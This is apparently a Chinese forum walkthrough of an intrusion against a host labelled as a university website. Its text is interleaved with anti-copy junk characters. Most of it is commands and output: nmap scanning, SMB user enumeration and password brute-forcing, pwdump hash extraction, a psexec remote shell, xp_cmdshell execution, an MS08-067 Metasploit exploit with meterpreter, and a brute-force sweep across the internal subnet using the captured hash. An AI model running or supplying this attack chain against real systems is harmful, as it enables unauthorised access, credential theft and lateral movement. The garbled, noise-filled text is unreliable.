广西师范网站http://202.103.242.241/
! Y" B& \2 o& T* B1 a3 Z& ]+ v
* S }0 i4 L9 Y/ V% Hroot@bt:~# nmap -sS -sV 202.103.242.241! T% C. M0 T# R$ o
& m0 A! v* E+ n3 q) FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST$ Q% w& X' ^; [/ M4 z/ g$ Q
/ L- u' |: N. u% T2 R$ QNmap scan report for bogon (202.103.242.241)( B& Z' b: B+ W" g( ]& k
: Z- k% i- T8 vHost is up (0.00048s latency).2 A$ ]6 Z' _3 k, H/ P, a. [
* X& e# q! k0 N, U+ G( vNot shown: 993 closed ports* y1 z5 [- b2 u# V5 X8 P
$ v r9 y! u: ]& [7 dPORT STATE SERVICE VERSION
( z$ x) G6 l( `/ U: V
: c: `* h' Y9 k, C+ ^135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)( `4 D. X0 J$ X( P# o
. q. h1 c# Y! U
139/tcp open netbios-ssn
. w* ^+ I6 }( D6 }2 Y; _9 `* A" ?2 c( L& k" M% g' s. y0 o
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
& U1 j6 K; |" b! c. W
0 l4 ?0 R) q# ^1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)! z( s+ E! q1 o* _/ U" Q: D
- Q$ m O$ c, a5 d$ F& Q1026/tcp open msrpc Microsoft Windows RPC5 R5 P7 i& i$ _3 V, h; w& _; x
& V- }* _. t2 [8 R! w
3372/tcp open msdtc?& V$ h$ x& j; b8 o
' T6 v2 }+ Y2 n3 u) k3389/tcp open ms-term-serv?. [, `( |9 q! Z+ L
+ { A1 D/ @0 {' `- r1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :6 f6 E6 t* l K% `& K( t2 {6 g
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r5 @) G9 `3 t' u& r" W+ I7 d
- S4 m* U Z7 R* c2 @SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
! d8 K% K* n, @2 p& ^; N
* M9 G, T" o/ FSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
2 B1 n+ }7 a& g7 S# g2 w
3 {, w2 j) l) {2 J. }. KSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO6 c8 N7 H8 M7 |8 D
& J/ u# t* U6 l. f
SF:ptions,6,”hO\n\x000Z”); H: V- e8 G3 @% h( o# t
( K, L/ J3 [' o6 VMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)' F$ @8 D4 F! V# i$ Q2 @0 S
/ i6 W y/ c7 Q( s' F: F7 W0 G* K/ G
Service Info: OS: Windows" s2 @( I: Z9 m/ G: V! d( Q6 k7 R0 H
! k3 u \, _6 o% m2 g% L
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+ x" p5 M* O8 z0 e ?* d3 N1 Y3 b2 P$ t: O, E" r5 b& ?' h
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
2 G7 e z0 g1 ^. v9 O
1 Z7 t+ z# {6 q, i, g, {& Oroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
B. o9 o, S. b& m, d- Y' D: v" y- b2 T) J" z/ f1 l
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
2 k9 G P( K( Z! v& i$ J' w$ q. G% M& ^/ k( h7 E: n
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse8 R! b+ b; V2 I) c
/ D4 [1 N6 t4 ^0 E-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
2 b- {2 Y2 x1 K$ B
4 j; `6 K6 m4 R) ]& j-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse4 V4 C4 M) Y- n; b$ {
8 f! t" e1 l3 P; s1 K7 O& B$ L-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse) S! m1 l/ {, K+ H# X
. d$ ~& u5 y5 d' T( j-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse% ]1 p; o. _' `3 t
d0 f# M7 C( {% I
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
( _9 l2 F! {+ @$ w7 A
, ^ D8 Q0 }/ { l4 D& g6 t-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse$ _3 s4 T& c3 u4 R* t! S
4 {: Y+ v4 ` E" J S
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
; \$ G: I' q$ {6 m5 s3 [6 E* i4 `7 j& e/ k$ f) {+ h5 w0 x7 H. i
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
9 I* A' V, o& y* R
) c! e0 a# J& \ \-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
+ \/ N, f# ]( p1 T
0 H/ X; i% j6 L8 Y$ e- t-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
+ A2 ?+ [; Y' S3 J( v/ B
2 f/ a G$ G4 X9 U( }; P0 }2 J-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
/ g6 n% f7 Q, w! x& \3 X
- k& J% C/ Q0 z/ H2 S, X9 v-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
" x7 |/ e, q/ w# D% i: p* M& _9 L5 A/ J% ~- Y
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse/ ~+ e2 A7 S% ]- T+ A; H/ h% O
# t: P( o" _# ~/ H- `) R$ z6 q" D& @5 ~
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 & p" q* P8 C: ]! F& U. W2 Y: T
7 j4 ]1 N, n9 X) w4 [( n* R
//此乃使用脚本扫描远程机器所存在的账户名
; _) A7 ]4 X6 s, M0 B* ]( I9 P4 N% F! l2 o( M- [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST9 ]# c r% ?; ?5 Z
: ?% M8 W, h) Z) s
Nmap scan report for bogon (202.103.242.241)
) w$ [1 A2 H1 Q$ h7 ^
8 ?6 G. Z* i+ |( QHost is up (0.00038s latency). L, N1 J5 M4 c, a
) D3 z5 m8 \. J+ dNot shown: 993 closed ports
* Q7 @9 [2 V6 Y% i- I r/ G( E/ G9 g" I/ O7 p
PORT STATE SERVICE; G3 d5 q* j B$ N! T# V0 m
6 y+ H$ \: l( P4 L2 ]135/tcp open msrpc
1 d: {5 z6 j4 k. x5 A {
+ r! U1 A/ F% n/ S$ V139/tcp open netbios-ssn
& B6 L. t6 p& \- _! z) A" J+ ^: t3 o; ?5 E* l
445/tcp open microsoft-ds
5 u6 Y+ c" v( k- U# p% T: B o3 m6 t. n/ H
1025/tcp open NFS-or-IIS
9 e* v, E) v) X, q8 }4 G6 R& ~4 L O% S
1026/tcp open LSA-or-nterm% O& ^# j& T" d
3 _. n) G R+ j9 h; N3372/tcp open msdtc
( |4 ~0 q, F. p$ |; ~" Q
8 B& y* r3 C% k8 S" \3389/tcp open ms-term-serv
) Q7 R! I) N7 M) |9 O, |0 f
5 \! B8 y9 ?) }& j4 J4 eMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)5 k& `( o6 F% u2 T
' f& l+ e. l+ P$ s4 @4 vHost script results:
( I5 U6 ~' ]$ K. h9 u& b3 c$ r7 W) V# i4 D
& ?4 Q; V) ^7 o& A( V/ }! ]| smb-enum-users:
, S9 {3 X H; ^) Q/ J
2 i$ J/ X) C u( n|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
; A: W, W% k8 W( d, ~4 w$ J( a3 p6 H2 r
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
# d. }% x% ]/ b: z: m+ g0 ^* L/ A# U# P) s
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 $ I6 z0 [ U# \, K7 M" F0 g- Z, r
% e. X2 C5 @' @" F+ U1 W, o% g
//查看共享 R& J3 L" t2 P# H2 A( {4 N
1 v; G$ P: H2 w
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST G9 n# b4 D* `
) N8 g3 h% g- z' G" SNmap scan report for bogon (202.103.242.241)
& V/ ?+ Y" ~- z4 L6 {4 T! m
' r: [7 N7 P9 h1 QHost is up (0.00035s latency).
: {5 e3 _6 [- [( w+ b+ t4 S
0 c5 i* c, ?9 X, lNot shown: 993 closed ports- ~2 q/ o3 a& y) S% X; z8 L5 T
. ]: I$ _9 f3 W; BPORT STATE SERVICE
# t9 e1 j0 y) W# {+ J( M; r" }) K' F! Q( }+ V% x
135/tcp open msrpc7 H" \5 m9 q/ u4 m
: a: V! \1 Z; L8 Y3 `. P# D139/tcp open netbios-ssn
$ O3 f% F( Z" j& L: |
1 O% {( s3 z: _& y% ]445/tcp open microsoft-ds
0 g* H4 p0 P' J
& f4 w9 B% `+ i7 U1025/tcp open NFS-or-IIS
1 I1 {* K o0 y5 E/ g2 D* C0 z: e) p4 ~4 L' e9 l8 }
1026/tcp open LSA-or-nterm
& {$ y9 Q4 j l. q b& r6 ?" X$ u+ M4 P3 z
3372/tcp open msdtc4 k$ H7 u2 }4 G; x
) z7 V# k( X' Z. f, Y3 T3389/tcp open ms-term-serv4 W1 `/ x% m* Z
/ w$ }$ i( }: y& S. k y* ~MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems) b* i7 X* ^, ]6 k' m8 p
- {/ W: _9 _# q" L" I
Host script results:( z4 j& X6 z* a% X: @
8 H+ y: D$ d& p% U8 R
| smb-enum-shares:+ y2 K, p* }; ^$ P9 w K) C
6 n( y: u! K$ |7 i- G& ?
| ADMIN$! {6 q" {# }1 H( g/ E; V; H* Q
7 S$ r* |' X) C/ }% _& l2 {* O: l| Anonymous access: <none>" p6 @" X0 c/ m% Y e, h
2 m( M+ I- {/ P/ t| C$: t: x. D* E/ z+ L
' F. `8 Y6 p5 k% d% J/ C4 h0 U| Anonymous access: <none>
5 T1 x1 j4 [% _
9 @9 k9 O G$ p. f K v# m| IPC$* L9 k8 c) c% W& \ [
2 |; I8 \5 \9 C( R: d+ C
|_ Anonymous access: READ6 Z( `4 g8 A: W5 x5 A9 H2 W
5 t" `' Q8 B( V7 Y/ KNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
& Q8 m/ C/ N5 H' x+ ?2 q( C. W5 L1 [ F) s2 A, ?: V
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
. G5 E P( a% Q2 |% J! K8 [
; K# ~" O6 W v$ f' p! N( n//获取用户密码5 W& c1 L E5 H& V$ p6 A
, S: B& y# C# r' |3 S5 Q# y+ u2 zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
0 C: h! e, e, g& c! X
& z5 w& ?, ^' _( A# J+ ?; Q) `Nmap scan report for bogon (202.103.242.2418)
: y" n1 f% w8 h9 u2 G; d, V9 ?+ U" L& d! ?2 G7 C* ], o5 _
Host is up (0.00041s latency).
9 _5 N, ?8 R# l2 z* i6 s& D8 H9 I3 C/ Z
Not shown: 993 closed ports
& o5 r% b8 r% ?0 X1 z
: u! ^, i2 J, i3 r6 LPORT STATE SERVICE
( Q4 r. j1 d& J* Z& `* x; O
; D% B, v' S& L135/tcp open msrpc) N2 o7 G, _1 U
$ X f1 z5 ~0 B0 v/ {* k; f
139/tcp open netbios-ssn6 C9 {& z8 u, O; C
5 x- G4 W8 F8 i
445/tcp open microsoft-ds
+ h+ n' \ y! @% D0 Z) ~+ n) w% N' Z/ j6 F( m% z
1025/tcp open NFS-or-IIS
* Q4 N5 x9 m3 R+ Q8 G
9 O" }4 R8 I5 m! M- G' ~1026/tcp open LSA-or-nterm
, Z& v2 e: x* ?# d* C) V" R
n) v8 y0 q1 _. G/ L! M3372/tcp open msdtc
$ \# u6 |' y( w9 \4 l n; ]+ g; |! N( t6 q2 R+ [
3389/tcp open ms-term-serv
5 U0 Y. }9 q; R a; b" U, X# q6 C9 q S) d
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( k- w- y$ D. n: Q# x, S2 H
$ Q/ Y+ H, l8 |/ bHost script results:
+ \+ `6 d j% H7 m E/ A3 X' e1 V# R1 j& c a
| smb-brute:
$ Z8 K6 o7 G: p; z% A( l8 @' I
0 c8 O0 w2 R, K, m, Q* padministrator:<blank> => Login was successful' R+ J' T" W* q1 C4 f; e0 h
( A3 Y' R- i5 @% \/ p: m/ \|_ test:123456 => Login was successful
% T9 x5 U3 s; L# @/ D$ {
5 t5 Q. f! T/ ?Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 a/ u7 \+ O {% j' f/ v1 w2 \6 d$ S, [/ ]3 W2 q" d5 N- F+ \
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash( w1 |6 M: c' d# B+ n3 q) B; [
5 {) H$ i. S% H% R, [: |
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
: B0 U4 y! S E' U
2 s. m, u8 J' }7 ?, nroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
9 }+ X7 w) C o, l$ k2 P$ W) H/ o. x3 m0 X
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1395 Z# B& w. E: t8 N. ]( w
& F; g2 M g7 m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST( b! M# V, D! k% o/ I3 R
( D2 x* e! y/ H; B6 B. w7 ?Nmap scan report for bogon (202.103.242.241)& O& D0 N+ o3 ^/ \* S# G/ o2 z- G
. k. ?' V3 p; A( J0 Z+ O0 ~6 ^+ c, t/ z
Host is up (0.0012s latency).
& Q; g) v2 Y8 o) w" M/ i0 o3 c" M9 _% K$ c* q
PORT STATE SERVICE
3 o7 o3 s$ S Z6 j5 o8 R' s8 j* m( h4 T7 P9 m: X+ @( z
135/tcp open msrpc
# j2 t3 ~! f. D; R8 ?$ ~8 L
! r, `0 B" ?/ ~- `5 Q2 \139/tcp open netbios-ssn
% G, ]! z$ q ]8 s" U. L7 Y0 R3 a8 \+ M
445/tcp open microsoft-ds! Z0 E! E X2 y# V- H
4 |( b3 s; [) w! ~( T1 q
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
" g6 u. M' F6 v+ r! r/ h, k' p% _ |1 Q
Host script results:
' U5 y4 Q0 ?4 z: ]" f( c9 m' R, D6 ~% y! D% i: B6 L* S
| smb-pwdump:' {- \2 e3 `8 G/ O4 }5 W
9 @! O* z* R! E
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
" `/ _& m/ s5 j+ m3 W
0 w" m7 s; G# N" Q* X* I. ] a| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
# I( J2 o' ?3 ~9 d) l% L% |
# t0 f, W, K) F% L8 R9 _' G' B| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
- l# T# h# Y5 |* a
% h2 M. m, V+ G; g|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
! b: l6 d, X/ e+ {8 v: g6 ~
A; w& I- X+ _3 E! SNmap done: 1 IP address (1 host up) scanned in 1.85 seconds; p7 p) Y |1 `8 w! @* T/ ^7 B0 h
. d/ P( H3 e( O. _ @6 T9 ^
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell* H* p3 }$ F* e. O2 r4 g
- S' _- e3 u. b: h3 x! a9 R
-p 123456 -e cmd.exe
8 q$ F, s, U/ m; p
+ w! K( ^9 v2 r4 \; t, HPsExec v1.55 – Execute processes remotely
# o" S2 m/ Q' v8 |5 R% Q+ J) Z# C, b1 ~* k2 x: n
Copyright (C) 2001-2004 Mark Russinovich
3 P6 W8 L8 K; A. |
0 T: S( ]0 c9 \: q" Y5 r4 ~Sysinternals – www.sysinternals.com
8 R; ~9 B( G+ _* `, V2 L) C5 q0 ]; @& |& v/ q
Microsoft Windows 2000 [Version 5.00.2195]% O6 ?, P% c* t; l% J. V
3 s" R; G. y5 A) ^& h; P# j4 z$ g(C) 版权所有 1985-2000 Microsoft Corp.
- i: ~5 s. H3 q& D, w
" F6 g; y( Y8 H( Y( _C:\WINNT\system32>ipconfig4 K# f+ x s- h
6 X- }- E. S D2 u
Windows 2000 IP Configuration
- G/ u( C& G$ I& M9 l
9 A9 Y$ ^8 Y p5 d$ JEthernet adapter 本地连接:
' I9 Z% }# Y" \7 I4 n) v) U n
1 M* E5 [4 L9 d" o/ pConnection-specific DNS Suffix . :) c/ _8 r4 T& x" z2 b" g# I q
7 o4 c/ o$ v( kIP Address. . . . . . . . . . . . : 202.103.242.2415 b1 Z) q% a: X9 x6 S
7 N8 c6 c/ G/ |2 O' U E
Subnet Mask . . . . . . . . . . . : 255.255.255.0
4 c4 } q2 M5 T9 p/ B3 u, s }
' g+ ^- u$ N0 O, UDefault Gateway . . . . . . . . . : 202.103.1.1
7 v8 i; W% H, _* ^2 u/ Y" I, F* i* B& r8 q9 k# l/ f2 Y
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
% V* l7 R5 F+ w8 ]2 [* K- a
5 d& e% P+ R* _2 H& [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
& G! d# D, C1 _) [# x7 [; O8 V& U( s r( U. A" F% K" b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST' {1 Z4 ^0 p2 d
1 l* d9 Y8 |) B- S6 j' w. zNmap scan report for bogon (202.103.242.241)
, I, A7 q- {8 A+ z3 v/ N7 y# J2 p4 F( z g% s; C
Host is up (0.00046s latency).$ s$ M8 c2 r/ i0 t6 X5 [
9 O. a) E1 W# _- z0 I5 ?Not shown: 993 closed ports
2 H4 {3 Z- D7 w6 b3 P
7 \5 H8 N* H; b9 T) \& oPORT STATE SERVICE
- i9 r- n# B/ d! q# a- O5 X0 ~' D3 b0 Z( s# j5 D* f
135/tcp open msrpc' v9 b: C) ^; |: d% Y$ j) R
/ T5 k' q$ V# i
139/tcp open netbios-ssn; O2 l- h0 N: D) X! ]* i* _7 ~
& C1 i- d; ?1 ~% w/ @; q C7 O
445/tcp open microsoft-ds. l6 D$ G0 M: B( U
( |$ `& F) q1 Y. h0 q# U; V. H
1025/tcp open NFS-or-IIS
# z9 Z: {2 i. u; s; p; f; _
$ @" N8 z' z: T9 E) _1026/tcp open LSA-or-nterm! C5 ^1 V- L- a! T7 S5 u% c
: K& A0 H8 W* n3372/tcp open msdtc
8 k: u" K2 }$ ?# P* ?; E6 s. d% Q
\8 [* K5 \" Y1 i n; r0 c& i3389/tcp open ms-term-serv
6 `" ^; d$ u& \: V4 G/ f% [: e0 Z2 C
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)4 U& X3 ]; S; U* L
$ h7 d9 D4 ]( O4 E9 `% w6 EHost script results:
9 v: h! k3 v% d
4 i/ t0 \7 k* O/ ^| smb-check-vulns:
7 W7 b+ X* j. r. t6 X
- i$ ~; P, ~, q( k" h6 V|_ MS08-067: VULNERABLE( Z: a+ Y6 A5 H$ g
3 K- e4 B V3 A# @( \. LNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
9 e9 {. k j6 x8 N z" M/ _( a) u1 N* l& s2 k
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出/ E% S: D& I6 k
9 n3 X7 c2 m$ ^' y( a. ^msf > search ms08+ _, J5 S; Z0 B9 Z4 F) G6 N
% I! R; J/ x7 |
msf > use exploit/windows/smb/ms08_067_netapi; Y/ b- m4 Z# o
) p0 w% h9 q3 O, P/ A6 c+ R
msf exploit(ms08_067_netapi) > show options- E2 g# x* v* J5 a: M2 `
9 q2 q; }7 }0 \& ?5 L
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.2418 z, P& }- T I9 A* \$ p
6 e. e: F3 z. q1 N5 i( b
msf exploit(ms08_067_netapi) > show payloads: j0 g! e+ U. o7 r& v. E. x
k$ G) q g' E+ wmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
$ H$ O6 \4 A7 ]3 N4 K- C
! \" i; F" a, v5 Y6 @% Cmsf exploit(ms08_067_netapi) > exploit
9 I7 V6 [* P$ j; t
( D- g/ c6 X" Bmeterpreter >
_, A$ T1 @- T' q9 P1 G! Z; o! R$ e' N
Background session 2? [y/N] (ctrl+z)% P2 P! n1 G _4 [- Z
$ Z$ o/ \6 F3 q" B/ ?msf exploit(ms08_067_netapi) > sessions -l# I) x2 C( k# ~# e. ^
6 k# g3 r( g \* T3 {. N. troot@bt:/usr/local/share/nmap/scripts# vim usernames.txt" J7 f- J5 l7 ]& I
& C: |# }2 E6 L" J! Y F) l
test' F5 X7 n) |8 D7 R" }
3 a* T. A/ H0 b7 R) f/ B U6 V
administrator
' U1 I" Q6 g$ _8 m4 R
% q/ D. m! G( X0 ~3 Jroot@bt:/usr/local/share/nmap/scripts# vim password.txt
& s! i1 w. v- m: c/ [2 g' u) a t; I; W$ x) `6 P* N, g- P Y
44EFCE164AB921CAAAD3B435B51404EE, g7 h# \& R) m* h$ Y, j
5 X- D: ~8 }7 n9 A+ F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 0 L, W4 u& Y- \
* M2 O5 }. x/ P; b- X: \
//利用用户名跟获取的hash尝试对整段内网进行登录0 B. R& x ]6 V9 ?9 r5 L1 E
0 u" o3 J7 F6 p' q4 _( H0 E
Nmap scan report for 192.168.1.105" e1 |3 F. `& R0 v5 x9 R3 U
. M i1 L T! }+ l! D/ {8 p2 }( nHost is up (0.00088s latency).
" x, z8 L' E! a9 d$ @* w/ B: T9 A3 W$ ?' h0 L
Not shown: 993 closed ports4 X. T/ S \- p: t" p7 G; e* i3 E
8 ~( u1 U2 Z4 T( Y M4 LPORT STATE SERVICE
( p$ ]& z( U( V' h C
1 V9 M+ C4 r* @- ?- q3 u/ t- W135/tcp open msrpc4 E, M' M ]" D" I
2 X$ Q+ [4 P& ] J8 i6 z# Y139/tcp open netbios-ssn% V T' O. v0 E- ~& ?; I
9 g/ a) G/ N: P; |& b. j445/tcp open microsoft-ds k, F4 l2 ?& {8 z
; \! d5 q- w9 R
1025/tcp open NFS-or-IIS" d! w! m: v' `) d S
( X9 l9 l( Z% _" q4 l; D g
1026/tcp open LSA-or-nterm
8 I* B- y( T% I: N6 P6 D
4 x: n3 v% c* U+ [3372/tcp open msdtc9 i4 [0 t! b+ X l( \9 V; ^5 J
7 ?& _ T* R# h. }
3389/tcp open ms-term-serv1 Y. N; h/ L1 y$ G' w; `: u6 U
8 w0 p. F* v/ k9 f/ T; OMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)) h, P, |2 w; ~) i8 E4 }( n3 g
5 L4 z# [+ F/ G6 u f6 q
Host script results:0 P0 L9 x7 N2 z J1 n& M- r
9 c" [. |6 [$ r* I* u2 B. ]| smb-brute:
- K+ T: c# A) y, s/ ]
* J5 T( v* c0 \: T2 ^|_ administrator:<blank> => Login was successful
0 ?0 C8 ?( X5 ]0 Q+ z0 M
' ]4 [; j( b% [9 u }* {攻击成功,一个简单的msf+nmap攻击~~·
9 I! _! G# D; {6 d# K) d! ^( Q* C$ z$ ~5 ?/ W- h0 O. \" t
|